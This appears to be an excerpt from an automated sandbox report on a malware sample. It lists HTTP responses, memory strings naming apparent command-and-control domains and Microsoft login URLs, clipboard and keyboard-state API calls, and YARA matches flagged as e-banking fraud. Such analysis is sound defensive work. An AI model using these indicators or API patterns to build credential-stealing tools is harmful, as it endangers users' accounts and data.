                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYIazJ6H8qLVrGgl05NVc8nJBB6mtPopQ03p%2FT4WiLATGV9QSZHnsehaMr7VOY2Z2HjM8TrPtHwV%2FXP3s4RW1I%2FyIkJuJlAVLl3LNlGUf5uByvMkC8y4tVRUWI235p7r3x%2FzK3b8AzjoKyo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570b3f3ba8729f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:24:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 08:25:02 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20QctgtnUAu12sMW441BhxUscYiFWId6jrw%2F66N3kmYCsDXASlFClJyBMlF7pf0I%2FTj3Bn%2FK%2FnoDT6QXP%2B8siTxSUIfJF4n5gLj9rzFjKD%2FHzzT9RbzkXaPP6bTu8JoBh8eZ9raDSg8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570c0ec82e42bd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:25:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 08:25:05 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEryPHZFxfvqARwhFeSZQfE%2Bc5NVrs7g2mM%2FkI7FTYHvfnY0KYQI31TV4aszXfbQ4WPOWoJWlu0pn56tLwUyOsw6z9kV%2Bj60sC5jhyBpsqHoJaIblw0smN2Il9D7ESn5u01t3Ot6Hak%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570c1ebf881a03-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:25:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 08:25:07 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9r5o9D6kHiNolSFOI8NMqmiLcZAVT8i1n5j3VEBjxvcB9aCGr6gLJLwKizHcMYvwW2vEv68nKJERP1VCYJdvWudnKmWR0FSbsqmQhDnQO3rxzb07wmZ%2F422und0avyehxa%2Ff1fa0Q38%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570c2e9c9a42d1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1799&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 08:25:10 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=luQuSe9vfCf9yA13%2ByaiBmn4CT9%2BFx5a6QiVowTbU6dtGWae%2BHnff8NXMJH9UR8eK3YlvjKD4lf6xEe4BqCbEuBoT%2FpIdHQtLGUFz7mAnihq99gnN0msim%2BEChEMokloYcP9vMXh1q4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e570c3eae16440d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 20 Nov 2024 08:25:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 20 Nov 2024 08:25:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 20 Nov 2024 08:25:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.00000000062F8000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003B38000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: zJGHFZpQDL.exe, 00000009.00000002.3132931690.00000000080DE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dating-apps-az-dn5.xyz
                Source: zJGHFZpQDL.exe, 00000009.00000002.3132931690.00000000080DE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dating-apps-az-dn5.xyz/pn0u/
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.000000000661C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003E5C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732091041.9737598049&other_args=eyJ1cmkiOiAiLzBnaX
                Source: winrs.exe, 0000000A.00000002.3125614806.0000000003E5C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.earbudsstore.shop/
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.0000000006F88000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.00000000047C8000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3127930198.0000000005E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winrs.exe, 0000000A.00000002.3122304267.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winrs.exe, 0000000A.00000002.3122304267.000000000086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winrs.exe, 0000000A.00000002.3122304267.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winrs.exe, 0000000A.00000003.1577119462.00000000078DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winrs.exe, 0000000A.00000003.1584328647.00000000079A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zJGHFZpQDL.exe, 00000009.00000002.3131138704.0000000005FD4000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125614806.0000000003814000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1691083286.0000000037E24000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00946B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00946B0C
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00946D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00946D07
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00946B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00946B0C
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00932B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00932B37
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0095F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0095F7FF

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: This is a third-party compiled AutoIt script.0_2_008F3D19
